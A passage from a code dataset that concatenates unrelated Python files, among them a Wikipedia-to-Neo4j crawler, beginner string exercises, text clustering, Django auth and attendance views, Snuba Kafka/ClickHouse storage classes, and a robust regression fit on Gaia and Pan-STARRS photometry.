plt.plot(np.squeeze(cum_cost_list_EI), np.array(loss_list_EI), label= 'ei', color= 'red')\n plt.scatter(np.squeeze(cum_cost_list_EI), np.array(loss_list_EI), label= 'ei', color= 'red')\n\n plt.legend()\n plt.xlabel('cost'); plt.ylabel('loss')\n plt.show()\n\n\nloss_and_count_dict= {'ei':[loss_ei, count_ei, cost_grid], 'ei_pu':[loss_ei_pu, count_ei_pu, cost_grid],\n }\n\n\nloss_and_count_dict= delete_invalid_loss_and_count(loss_and_count_dict)\n\n\nplot_average_loss(loss_and_count_dict)\n\n\n","sub_path":"bo_cost_budget_cont_domain/comparison_of_methods_cont_domain.py","file_name":"comparison_of_methods_cont_domain.py","file_ext":"py","file_size_in_byte":5090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"263825887","text":"from queue import Queue\nfrom wikipedia import wikipedia, exceptions\nfrom app.database.database import database\n\n\ndef insert_documents(document_limit, start_document_title, start_document_parent=\"\"):\n counter = 0 # This counter counts the added documents\n visited_links = set() # This set contains all visited links (documents)\n queue = Queue() # This queue is used for implementing the BFS algorithm\n\n database.open_connection()\n\n start_node = {\"title\": start_document_title, \"parent\": start_document_parent} # Creating the start node\n queue.put(start_node)\n\n # Start BFS algorithm\n while counter < document_limit:\n node = queue.get() # Get the current node\n title = node['title']\n\n # Check if we have visited this link previously\n if title in visited_links:\n continue\n\n visited_links.add(title) # Add the title of the document as visited\n\n try:\n page = wikipedia.page(title) # Get Wikipedia page for given title\n except exceptions.DisambiguationError as e:\n page = wikipedia.page(e.options[1]) # If there are multiple pages for that title, choose the first one\n except exceptions.PageError as e:\n continue\n # Add new document and the title as tag in the database for the given page\n database.query(\"CREATE (doc:Document {title: {title}, content: {content}})-[:TITLE]->\"\n \"(tag:Tag:Title {value: {value}})\",\n {\"title\": title, \"content\": page.content, \"value\": title})\n\n # If there is known page from which we got the current page, create a relationship between the two documents\n if node['parent'] != '':\n database.query(\n \"MATCH (doc1:Document {title: {title}}), (doc2:Document {title: {parent}}) \"\n \"CREATE (doc1)-[:LINK]->(doc2)\",\n {\"title\": title, \"parent\": node['parent']})\n\n # Pass all the links in the current page\n for link in page.links:\n # If the link is not visited add it in the Queue\n if link not in visited_links:\n queue.put({\"title\": link, \"parent\": title})\n # Otherwise add a relationship between the current page and the visited document in the database\n else:\n database.query(\n \"MATCH (doc1:Document {title: {title}}), (doc2:Document {title: {parent}}) \"\n \"CREATE (doc1)-[:LINK]->(doc2)\",\n {\"title\": link, \"parent\": title})\n\n counter += 1 # Increase the counter of processed documents\n\n database.close_connection()\n","sub_path":"app/data_import/insert_documents_and_tags.py","file_name":"insert_documents_and_tags.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"371508545","text":"import collections\nimport os\n\n\n# case 1: print lines with more than 20 characters in words.txt\n\nprint(os.getcwd())\nline = [line.strip() for line in open('words.txt', 'r') if len(line.strip())> 10]\nprint(line)\n\n#case 2: write a function to find out the words which do not have letter e; function name has_no_e\n\ndef has_no_e(str):\n e = str.find('e')\n if e < 0:\n return True\n else:\n return False\n\nprint(has_no_e('hallo boss this is not your hom'))\n\n#case 3: modify above code to only print the words with letter 'e' and print the percentage of words with 'e' in the list\n\ndef has_no_e_list(str):\n str_no_e =[]\n str_list =str.split() # split() created a list of strings and stored in str_list\n print(str_list)\n print(len(str_list))\n for word in str_list:\n if word.find('e') < 0:\n str_no_e.append(word)\n print(word)\n\n e_percent=len(str_no_e)/len(str_list) * 100\n print(e_percent)\nhas_no_e_list('hello my name is kailash and i am an athelete')\n\n\n#case 4: write a function avoids which takes a word and a string of forbidden letters and returns True if the word doesn't \\\n# contain any of the forbidden letters\n\ndef avoids(word, forbidden_letters):\n for letter in word:\n print(letter)\n if letter in forbidden_letters:\n return False # here you are returning from for loop\n return True # upon successful completion of for loop, here you are returning from function\n\n\noutput = avoids('kailash','pua')\nprint(output)\n\n\n#case 5: Write a function named uses_only that takes a word and a string of letters, and that returns True if the word contains\n# only letters in the list. Can you make a sentence using only the letters acefhlo? Other than “Hoe alfalfa?”\n\n\ndef uses_only(word, letters):\n for letter in word:\n if letter not in letters:\n return False\n\n return True # very important again, you are returning True from function. i typed return statement soon after defining function\n\nprint(uses_only('hellop','aeiouhl'))\n\n\n# case 6# Write a function uses_all, which takes a word and string of letters which use the letters at least once\n\ndef uses_all(word, letters_all):\n for letter in letters_all:\n print(letter not in word, letter)\n if letter not in word:\n return False\n\n return True\n\nprint(uses_all('hello you eat ice','aeiouz'))\n\n\n# case 7: Write a function called is_abecedarian that returns True if the letters in a word appear in alphabetical order\n# (double letters are okay). How many abecedarian words are there?\n\n\"\"\" very interesting exercise --- a must do for all\"\"\"\n\n# for loop\n\ndef is_abecedarian1(word):\n previous = word[0] # use a variable previous and assign the first letter to it\n for letter in word: # check if first letter of word is less than previous? if yes, return False and terminate\n if letter < previous:\n return False\n previous = letter # else assign the current letter of previous variable\n print(previous)\n return True # when if loop completes without returning a False, that means everything is True and thus function returns True\n\n\nresult_abeced = is_abecedarian1('ace')\nprint('1: ',result_abeced)\n\n\n# recursion\n\ndef is_abcedarian2(word):\n if len(word) <= 1: # usual recursion case of when to return True; if len of word is 0 or 1, its True\n return True\n if word[0] > word[1]: # usual recusion case of when to return False: if first letter is larger than second, condition fails. return False\n return False\n return is_abcedarian2(word[1:]) # very interesting. this slicing is reducing the first letter every time this function is getting called\n # and the reason for this is, slicing is creating a new word list everytime. check id for verification\n\n\nresult_abeced2=is_abcedarian2('abed')\nprint('2:',result_abeced2)\n\n\n# case 7 : find the largest, second largest and third largest number in a list\n\nfinal_score = [120, 140, 99, 76, 105, 112, 143, 137]\n#print(final_score)\n\nfiltered_score = []\n\nprevious = final_score[0]\nindex = 0\n\n\"\"\" Below code is to find largest value in list\n\nfor i in final_score:\n if previous < i:\n previous = i\n\n print(previous)\n\n\"\"\"\n\nwhile len(filtered_score) < 4:\n for i in final_score:\n if previous < i:\n previous = i\n\n filtered_score.append(previous) # append the result to a new empty list\n print(filtered_score)\n print(previous)\n final_score.remove(previous) # remove the highest value from existing list\n previous = final_score[0] # reset previous to the first item in existing list\n #print(final_score)\n\nprint(filtered_score[3])\n\n\n\n","sub_path":"Python built in containers/Case study1.py","file_name":"Case study1.py","file_ext":"py","file_size_in_byte":4701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"482684498","text":"# Stage 2: Applying different clustering methods to the given data set.\n\n\nimport pandas as pd\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\n\n\n# read paper_dataset, paramaters are: paper_id\tvenue\tauthors\tyear\ttitle\tindex_keys\tauthor_keys\tabstract\npaperDataset = pd.read_csv('paper_dataset.csv', encoding=\"ISO-8859-1\")\n\nindex_keys = paperDataset.index_keys\npaper_id = paperDataset.paper_id\n\n############################## tfidf ##########################################\ncountVect = CountVectorizer(stop_words=\"english\", max_df=0.8)\nvari_mat = countVect.fit_transform(index_keys)\ntransformer = TfidfTransformer()\ntfidf = transformer.fit_transform(vari_mat)\n\n### combine the cluser result and generate a dictionary, in which key is the cluster number and value is the paper id \ndef combine_clusterResult(result, value):\n\tresult_dic = {}\n\tfor i in range(len(result)):\n\t\ttemp = result[i]\n\t\tif temp in result_dic:\n\t\t\tresult_dic[temp].append(value[i])\n\t\telse:\n\t\t\tresult_dic[temp] = [value[i]]\n\treturn (result_dic)\n\n\nimport matplotlib.pyplot as plt\n\ndef figure(input, str):\n index = []\n numbers = []\n for i, j in input.items():\n index.append(i)\n numbers.append(len(j))\n plt.figure('fig1')\n plt.bar(index, numbers, width=0.3, color=\"g\",\n align=\"center\", label=\"numbers\")\n plt.xlabel(str + \" clustering\")\n plt.ylabel(\"numbers\")\n plt.legend()\n plt.title(\"barplot\")\n plt.show()\n\n############################### Kmeans clustering ##########################################\nfrom sklearn.cluster import KMeans\n\nnum_clusters = 10\nkm_cluster = KMeans(n_clusters=num_clusters, max_iter=300, n_init=5,\n init='k-means++', n_jobs=-1)\nresult = km_cluster.fit_predict(tfidf)\nprint(result)\n\nresult_dic=combine_clusterResult(result, paper_id)\nprint( result_dic)\n################################ GAAC clustering #####################################################\nfrom nltk.cluster.gaac import GAAClusterer\n\nnum_clusters=10\ngaac=GAAClusterer(num_clusters=num_clusters)\ngaac.cluster(tfidf.toarray())\n# gaac.dendrogram().show()\nresult = [gaac.classify(i) for i in tfidf.toarray()]\nprint (\"Predicting result: \")\nprint(result)\nresult_dic=combine_clusterResult(result,paper_id)\nprint( result_dic)\nfigure(result_dic,\"GAAC\")\n\n\n\n\n\n\n","sub_path":"stage2/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"144062722","text":"# Running Average\n# Create a function running_average that returns a function. When the function returned is passed a value, the current average of all previous function calls. You will have to use closure to solve this. You should round all answers to the 2nd decimal place.\ndef running_average():\n\tavg = []\n\tdef inner_avg(num):\n\t\tavg.append(num)\n\t\treturn sum(avg)/len(avg)\n\treturn inner_avg\n\nrAvg = running_average()\nprint(rAvg(10))\nprint(rAvg(11))\nprint(rAvg(12))","sub_path":"Basics/140_Python_Ex_01.py","file_name":"140_Python_Ex_01.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"131101541","text":"from django.shortcuts import render,redirect\nfrom django.contrib.auth import authenticate,login,logout\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom .forms import UserLoginForm,UserRegisterForm\n# Create your views here.\n\ndef user_login(request):\n if request.method == 'POST':\n form = UserLoginForm(data=request.POST)\n if form.is_valid():\n data = form.cleaned_data\n user = authenticate(username=data['username'],password=data['password'])\n if user:\n login(request,user)\n return redirect('articles:articles_list')\n else:\n return HttpResponse('账号或密码有误,请重新输入')\n else:\n return HttpResponse('账号或密码输入不合法')\n elif request.method == 'GET':\n form = UserLoginForm()\n return render(request,'userprofile/login.html',{'form':form})\n else:\n return HttpResponse('请使用GET或POST请求数据')\n\ndef user_logout(request):\n logout(request)\n return redirect('articles:articles_list')\n\ndef user_register(request):\n if request.method == 'POST':\n form = UserRegisterForm(data=request.POST)\n if form.is_valid():\n new_user = form.save(commit=False)\n new_user.set_password(form.cleaned_data['password'])\n new_user.save()\n login(request,new_user)\n return redirect('articles:articles_list')\n else:\n return HttpResponse('注册表单输入有趣,请重新输入')\n elif request.method == 'GET':\n form = UserRegisterForm()\n return render(request,'userprofile/register.html',{'form':form})\n else:\n return HttpResponse('请使用GET或POST请求数据')\n\n\n@login_required(login_url='/userprofile/login/')\ndef user_delete(request,id):\n user = User.objects.get(id=id)\n if request.user == user:\n logout(request)\n user.delete()\n return redirect('articles:articles_list')\n else:\n return HttpResponse('你没有删除操作的权限')\n\n","sub_path":"userprofile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"218232402","text":"from dataclasses import dataclass\nfrom typing import Any, Mapping, Optional, Sequence\n\nfrom snuba import settings\nfrom snuba.clickhouse.http import JSONRow\nfrom snuba.clusters.cluster import (\n ClickhouseClientSettings,\n ClickhouseCluster,\n ClickhouseWriterOptions,\n)\nfrom snuba.datasets.message_filters import StreamMessageFilter\nfrom snuba.datasets.schemas.tables import WritableTableSchema\nfrom snuba.processor import MessageProcessor\nfrom snuba.replacers.replacer_processor import ReplacerProcessor\nfrom snuba.snapshots import BulkLoadSource\nfrom snuba.snapshots.loaders import BulkLoader\nfrom snuba.snapshots.loaders.single_table import RowProcessor, SingleTableBulkLoader\nfrom snuba.utils.metrics import MetricsBackend\nfrom snuba.utils.streams.backends.kafka import KafkaPayload\nfrom snuba.writer import BatchWriter\n\n\n@dataclass(frozen=True)\nclass KafkaTopicSpec:\n topic_name: str\n partitions_number: int\n replication_factor: int = 1\n\n\nclass KafkaStreamLoader:\n \"\"\"\n This class is a stream loader for a TableWriter. It provides what we need\n to start a Kafka consumer to fill in the table.\n \"\"\"\n\n def __init__(\n self,\n processor: MessageProcessor,\n default_topic: str,\n pre_filter: Optional[StreamMessageFilter[KafkaPayload]] = None,\n replacement_topic: Optional[str] = None,\n commit_log_topic: Optional[str] = None,\n ) -> None:\n self.__processor = processor\n self.__default_topic_spec = KafkaTopicSpec(\n topic_name=default_topic,\n partitions_number=settings.TOPIC_PARTITION_COUNTS.get(default_topic, 1),\n )\n self.__replacement_topic_spec = (\n KafkaTopicSpec(\n topic_name=replacement_topic,\n partitions_number=settings.TOPIC_PARTITION_COUNTS.get(\n replacement_topic, 1\n ),\n )\n if replacement_topic\n else None\n )\n self.__commit_log_topic_spec = (\n KafkaTopicSpec(\n topic_name=commit_log_topic,\n partitions_number=settings.TOPIC_PARTITION_COUNTS.get(\n commit_log_topic, 1\n ),\n )\n if commit_log_topic\n else None\n )\n self.__pre_filter = pre_filter\n\n def get_processor(self) -> MessageProcessor:\n return self.__processor\n\n def get_pre_filter(self) -> Optional[StreamMessageFilter[KafkaPayload]]:\n \"\"\"\n Returns a filter (or none if none is defined) to be applied to the messages\n coming from the Kafka stream before parsing the content of the message.\n \"\"\"\n return self.__pre_filter\n\n def get_default_topic_spec(self) -> KafkaTopicSpec:\n return self.__default_topic_spec\n\n def get_replacement_topic_spec(self) -> Optional[KafkaTopicSpec]:\n return self.__replacement_topic_spec\n\n def get_commit_log_topic_spec(self) -> Optional[KafkaTopicSpec]:\n return self.__commit_log_topic_spec\n\n def get_all_topic_specs(self) -> Sequence[KafkaTopicSpec]:\n ret = [self.__default_topic_spec]\n if self.__replacement_topic_spec:\n ret.append(self.__replacement_topic_spec)\n if self.__commit_log_topic_spec:\n ret.append(self.__commit_log_topic_spec)\n return ret\n\n\nclass TableWriter:\n \"\"\"\n This class provides to a storage write support on a Clickhouse table.\n It is schema aware (the Clickhouse write schema), it provides a writer\n to write on Clickhouse and a two loaders: one for bulk load of the table\n and the other for streaming load.\n\n Eventually, after some heavier refactoring of the consumer scripts,\n we could make the writing process more abstract and hide in this class\n the streaming, processing and writing. The writer in such architecture\n could coordinate the ingestion process but that requires a reshuffle\n of responsibilities in the consumer scripts and a common interface\n between bulk load and stream load.\n \"\"\"\n\n def __init__(\n self,\n cluster: ClickhouseCluster,\n write_schema: WritableTableSchema,\n stream_loader: KafkaStreamLoader,\n replacer_processor: Optional[ReplacerProcessor] = None,\n writer_options: ClickhouseWriterOptions = None,\n ) -> None:\n self.__cluster = cluster\n self.__table_schema = write_schema\n self.__stream_loader = stream_loader\n self.__replacer_processor = replacer_processor\n self.__writer_options = writer_options\n\n def get_schema(self) -> WritableTableSchema:\n return self.__table_schema\n\n def get_batch_writer(\n self,\n metrics: MetricsBackend,\n options=None,\n table_name=None,\n chunk_size: int = settings.CLICKHOUSE_HTTP_CHUNK_SIZE,\n ) -> BatchWriter[JSONRow]:\n table_name = table_name or self.__table_schema.get_table_name()\n\n options = self.__update_writer_options(options)\n\n return self.__cluster.get_batch_writer(\n table_name, metrics, options, chunk_size=chunk_size,\n )\n\n def get_bulk_loader(\n self,\n source: BulkLoadSource,\n source_table: str,\n dest_table: str,\n row_processor: RowProcessor,\n ) -> BulkLoader:\n \"\"\"\n Returns the instance of the bulk loader to populate the dataset from an\n external source when present.\n \"\"\"\n return SingleTableBulkLoader(\n source=source,\n source_table=source_table,\n dest_table=dest_table,\n row_processor=row_processor,\n clickhouse=self.__cluster.get_query_connection(\n ClickhouseClientSettings.QUERY\n ),\n )\n\n def get_stream_loader(self) -> KafkaStreamLoader:\n return self.__stream_loader\n\n def get_replacer_processor(self) -> Optional[ReplacerProcessor]:\n \"\"\"\n Returns a replacement processor if this table writer knows how to do\n replacements on the table it manages.\n \"\"\"\n return self.__replacer_processor\n\n def __update_writer_options(\n self, options: ClickhouseWriterOptions = None,\n ) -> Mapping[str, Any]:\n if options is None:\n options = {}\n if self.__writer_options:\n return {**options, **self.__writer_options}\n return options\n","sub_path":"snuba/datasets/table_storage.py","file_name":"table_storage.py","file_ext":"py","file_size_in_byte":6386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"211334263","text":"from PyQt5.QtWidgets import QShortcut\nfrom PyQt5.QtGui import QKeySequence\n\nfrom Constants import *\n\nclass Shortcut(QShortcut):\n def __init__(self, mainWindow, keyCode, command):\n super().__init__(keyCode, mainWindow)\n\n self.activated.connect(self.active)\n self.shell = mainWindow.shell\n self.command = command\n\n def active(self):\n if type(self.command) == list:\n for cmd in self.command:\n self.shell.run(cmd)\n else:\n cmd = str(self.command)\n self.shell.run(cmd)\n\n\nclass Shortcuts:\n def __init__(self, mainWindow):\n self.shortcut = {}\n\n for key in SHORTCUTS:\n for code in [ord(key), ord(key.upper())]:\n self.shortcut[code] = Shortcut(mainWindow, QKeySequence(code), SHORTCUTS[key])\n","sub_path":"pc/monitor/windows monitor/Shortcuts.py","file_name":"Shortcuts.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"473078306","text":"import json\nfrom operator import attrgetter\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views.generic import TemplateView\nfrom django.core.exceptions import PermissionDenied\nfrom rehearsal.models import Rehearsal, Actor, Attendance, Character, Scene, Appearance\nfrom production.view_func import *\n\n\nclass AtndTable(LoginRequiredMixin, TemplateView):\n '''出欠表のビュー\n '''\n template_name = 'rehearsal/attendance_table.html'\n \n def get(self, request, *args, **kwargs):\n '''表示時のリクエストを受けたハンドラ\n '''\n # アクセス情報から公演ユーザを取得しアクセス権を検査する\n prod_user = accessing_prod_user(self)\n if not prod_user:\n raise PermissionDenied\n \n return super().get(request, *args, **kwargs)\n \n def get_context_data(self, **kwargs):\n '''テンプレートに渡すパラメタを改変する\n '''\n context = super().get_context_data(**kwargs)\n \n # 戻るボタン用に、prod_id を渡す\n prod_id = self.kwargs['prod_id']\n context['prod_id'] = prod_id\n \n # 稽古リスト\n rehearsals = Rehearsal.objects.filter(production__pk=prod_id)\n rhsl_list = [{\n 'id': rhsl.id,\n 'place': str(rhsl.place),\n 'date': rhsl.date.strftime('%Y-%m-%d'),\n 'start_time': rhsl.start_time.strftime('%H:%M'),\n 'end_time': rhsl.end_time.strftime('%H:%M')\n } for rhsl in rehearsals]\n context['rhsls'] = json.dumps(rhsl_list)\n \n # 役者リスト\n actr_list = list(\n Actor.objects.filter(production__pk=prod_id).order_by('name'))\n\n actrs = [{\n 'name': actr.name,\n 'short_name': actr.get_short_name()\n } for actr in actr_list]\n \n context['actrs'] = json.dumps(actrs)\n \n # 役者ごとの出欠の、稽古リストに対応するリスト (3次元配列)\n attendances = Attendance.objects.filter(actor__production__pk=prod_id)\n actrs_rhsl_atnds = []\n for actor in actr_list:\n # その役者の出欠\n actor_atnds = [atnd for atnd in attendances if atnd.actor == actor]\n rhsl_attnds = []\n for rehearsal in rehearsals:\n # その稽古の出欠\n slots = sorted(\n [atnd for atnd in actor_atnds if atnd.rehearsal == rehearsal],\n key=attrgetter('from_time')\n )\n atnds = []\n for slot in slots:\n atnds.append(\n # 全日の場合\n '*' if slot.is_allday\n # 欠席の場合\n else '-' if slot.is_absent\n # さもなくば時間帯\n else slot.from_time.strftime('%H:%M') + '-'\n + slot.to_time.strftime('%H:%M')\n )\n rhsl_attnds.append(atnds)\n actrs_rhsl_atnds.append(rhsl_attnds)\n \n context['actr_atnds'] = json.dumps(actrs_rhsl_atnds)\n \n # 登場人物のリスト\n characters = Character.objects.filter(production__pk=prod_id)\n chrs = []\n for character in characters:\n # 配役が actr_list の何番目かを取得\n if character.cast in actr_list:\n actr_idx = actr_list.index(character.cast)\n else:\n # 配役がなければ -1\n actr_idx = -1\n chrs.append({\n 'name': character.name,\n 'short_name': character.short_name,\n 'cast_idx': actr_idx\n })\n \n context['chrs'] = json.dumps(chrs)\n \n # シーン名リスト\n scenes = Scene.objects.filter(production__pk=prod_id)\n context['scenes'] = json.dumps([scn.name for scn in scenes])\n\n # シーンごとの登場人物とセリフ数のリスト\n appearances = Appearance.objects.filter(scene__production__pk=prod_id)\n scenes_chr_apprs = []\n for scene in scenes:\n # シーン単品での出番のリスト\n scene_apprs = [appr for appr in appearances if appr.scene == scene]\n # 有効なセリフ数の平均値\n avrg_lines_mun = Appearance.average_lines_num(scene_apprs)\n # そのシーンに出ている人物のセリフ数のリスト\n chr_apprs = []\n for chr_idx, character in enumerate(characters):\n apprs = [appr for appr in scene_apprs if appr.character == character]\n if len(apprs) > 0:\n # セリフ数 (自動なら平均値)\n lines_num = avrg_lines_mun if apprs[0].lines_auto else apprs[0].lines_num\n chr_apprs.append({\n 'chr_idx': chr_idx,\n 'lines_num': lines_num\n })\n scenes_chr_apprs.append(chr_apprs)\n \n context['scenes_chr_apprs'] = json.dumps(scenes_chr_apprs)\n \n return context\n","sub_path":"rehearsal/views/atnd_table.py","file_name":"atnd_table.py","file_ext":"py","file_size_in_byte":5251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"86697974","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom scipy.optimize import least_squares\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import rcParams\nfrom astropy.io import ascii\n\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\n\n#------------------------------------------------\n\nfilename = 'for_robust_mag_err_0p02_260k_noBLUEEE_Xn1_visP8.dat'\ntbl = ascii.read(filename)\n\ncol_g = 'phot_g_mean_mag'\ncol_bp = 'phot_bp_mean_mag'\ncol_rp = 'phot_rp_mean_mag'\ncol_bp_rp = 'bp_rp'\ncol_bp_g = 'bp_g'\ncol_g_rp = 'g_rp'\n\ncol_g_ps1 = 'g_mean_psf_mag'\ncol_r_ps1 = 'r_mean_psf_mag'\ncol_i_ps1 = 'i_mean_psf_mag'\ncol_z_ps1 = 'z_mean_psf_mag'\ncol_y_ps1 = 'y_mean_psf_mag'\n\n\nconvert_to_numpy_array = ascii.convert_numpy(np.float)[0]\n\n# Если хотим использовать центрированные данные,\n# то centering = True \ncentering = False\n\ndef create_y(cols, centered=True):\n\t# В списке cols может быть либо один column, \n\t# либо два. И надо это будет проверять по его длине\n\t# и затем будет сделан выбор: работаем только со\n\t# значениями в одном фильтре, или с разностью в двух \n\tcol_1 = cols[0]\n\tfilter1 = convert_to_numpy_array(tbl[col_1])\n\tif len(cols) > 1:\n\t\tcol_2 = cols[1]\n\t\tfilter2 = convert_to_numpy_array(tbl[col_2])\n\t\ty = filter1 - filter2\n\telse:\n\t\ty = filter1\n\tif centered == True:\n\t\tmedian_y = np.median(y)\n\t\ty -= median_y\n\t\tglobal m_y\n\t\tm_y = median_y\n\treturn y\n\ndef create_var1(col,centered=True):\n\tx1 = convert_to_numpy_array(tbl[col])\n\tif centered == True:\n\t\tmedian_x1 = np.median(x1)\n\t\tx1 -= median_x1\n\t\tglobal m_x1\n\t\tm_x1 = median_x1\n\treturn x1\n\ndef create_var2(col,centered=True):\n\tx2 = convert_to_numpy_array(tbl[col])\n\tif centered == True:\n\t\tmedian_x2 = np.median(x2)\n\t\tx2 -= median_x2\n\t\tglobal m_x2\n\t\tm_x2 = median_x2\n\treturn x2\n\n\n# m_y, m_x1 и m_x2 будут хранить значение медианы массивов \n# y и переменных x1 и x2 соответственно. Для начала просто\n# создаются эти переменные, и потом, если \n# centering == True, они получат ненулевые значения\nm_y = 0.\nm_x1 =0.\nm_x2 = 0.\n#------------------------------------------------\n\n# В x_cols будут храниться имена переменных -- значений в \n# фильтрах или цвет. И тогда в x_degs должно быть указано\n# такое же количество переменных типа integer, которые \n# указывают степень полинома от соответствующей переменной \n# Степень x1 не больше двух, степень x2 не больше трех\n\n# В поле, ограниченное \">>> >>>\", нужно вводить данные\n\n# ЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖ\n# ЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖ\n# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n# DATA HERE DATA HERE DATA HERE DATA HERE DATA\n# >>>\ny_cols = [col_i_ps1]\nx_cols = [col_rp,col_bp_rp]\n# x_cols = [col_rp,col_bp_rp]\nx_degs = [1,3]\n# x_degs = [1,3]\n# >>>\n# DATA HERE DATA HERE DATA HERE DATA HERE DATA\n# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n# ЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖ\n# ЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖ\n\n\nif len(x_cols) != len(x_degs):\n\traise SystemExit('STOP: len(x_cols) /= len(x_degs)')\n\ny_array = create_y(y_cols, centering)\n\n# Переменных x может быть одна или две, и они должны быть записаны\n# столбцами в соответствующих степенях.\n# Следующий набор команд это и делает:\nx_var1 = create_var1(x_cols[0], centering)\nx_array = x_var1\nfor i in range(2,x_degs[0]+1):\n\tx_array = np.column_stack((x_array,x_var1**i))\nif len(x_cols) > 1:\n\tx_var2 = create_var2(x_cols[1], centering)\n\tx_array = np.column_stack((x_array,x_var2))\n\tfor i in range(2,x_degs[1]+1):\n\t\tx_array = np.column_stack((x_array,x_var2**i))\t\t\nx_array = sm.add_constant(x_array, prepend=True)\n\n\nrlm_model = sm.RLM(y_array, x_array, M=sm.robust.norms.TrimmedMean())\nresults = rlm_model.fit()\n\n# -----------------------------------------------\n\ndef centering_back(params,degs):\n\tA, B1, C1, B2, C2, D2 = 0., 0., 0., 0., 0., 0. \n\tA = params[0]\n\tif len(degs) == 1:\n\t\tglobal m_x1, m_x2\n\t\t# Потому что при построении x1 было получено m_x1, а \n\t\t# m_x2 так и осталось нулем. Но тут я работаю с одной\n\t\t# переменной как со второй (это подтверждают двойки \n\t\t# в названии используемых в этом блоке if переменных\n\t\tm_x1, m_x2 = m_x2, m_x1\n\t\tB2 = params[1]\n\t\tif degs[0] > 1:\n\t\t\tC2 = params[2]\n\t\tif degs[0] > 2:\n\t\t\tD2 = params[3]\n\tif len(degs) == 2:\n\t\tB1 = params[1]\n\t\tif degs[0]>1:\n\t\t\tC1 = params[2]\n\t\t\tB2 = params[3]\n\t\t\tif degs[1] > 1:\n\t\t\t\tC2 = params[4]\n\t\t\tif degs[1] > 2:\n\t\t\t\tD2 = params[5]\n\t\telse:\n\t\t\tB2 = params[2]\n\t\t\tif degs[1] > 1:\n\t\t\t\tC2 = params[3]\n\t\t\tif degs[1] > 2:\n\t\t\t\tD2 = params[4]\n\ta = m_y + A - B1*m_x1 + C1*m_x1**2 - B2*m_x2 + C2*m_x2**2 - D2*m_x2**3\n\tb1 = B1 - 2*C1*m_x1\n\tc1 = C1\n\tb2 = B2 - 2*C2*m_x2 + 3*D2*m_x2**2\n\tc2 = C2 - 3*D2*m_x2\n\td2 = D2\n\tif len(degs) == 1:\n\t\tif degs[0] == 1:\n\t\t\treturn np.array([a,b2])\n\t\telif degs[0] == 2:\n\t\t\treturn np.array([a,b2,c2])\n\t\telse:\n\t\t\treturn np.array([a,b2,c2,d2])\n\telse:\n\t\tif degs[0] == 1:\n\t\t\tif degs[1] == 1:\n\t\t\t\treturn np.array([a,b1,b2])\n\t\t\telif degs[1] == 2:\n\t\t\t\treturn np.array([a,b1,b2,c2])\n\t\t\telse:\n\t\t\t\treturn np.array([a,b1,b2,c2,d2])\n\t\telse:\n\t\t\tif degs[1] == 1:\n\t\t\t\treturn np.array([a,b1,c1,b2])\n\t\t\telif degs[1] == 2:\n\t\t\t\treturn np.array([a,b1,c1,b2,c2])\n\t\t\telse:\n\t\t\t\treturn np.array([a,b1,c1,b2,c2,d2])\n\n\ndef mdisp(X,W):\n M = np.sum(W*X)/np.sum(W)\n sW = np.sum(W)\n V = np.sum(W*(X-M)**2)*sW/(sW**2-np.sum(W**2))\n S = np.sqrt(V)\n return S\n\n# -----------------------------------------------\n\nprint('------------------------------------------')\nprint(filename)\nprint('TukeyBiweight')\nprint('y: '+str(y_cols))\nprint('x: '+str(x_cols))\nprint('x_degs: '+str(x_degs))\nprint('')\n\nprint('Parameters:')\nif centering == True:\n\tparameters = centering_back(results.params,x_degs)\n\tprint(parameters)\n\tprint('')\n\tprint('Centering ON')\n\tprint('Parameters and std err, centered data:')\n\tprint(results.params)\nelse:\n\tparameters = results.params\n\tprint(parameters)\n\tprint('')\n\tprint('Std err:')\n\nprint(results.bse)\nprint('')\nprint('dispersion:')\nprint(mdisp(results.resid,results.weights))\nprint('')\n\npvalues = results.pvalues\nfor i in range(len(pvalues)):\n\tpvalues[i] = 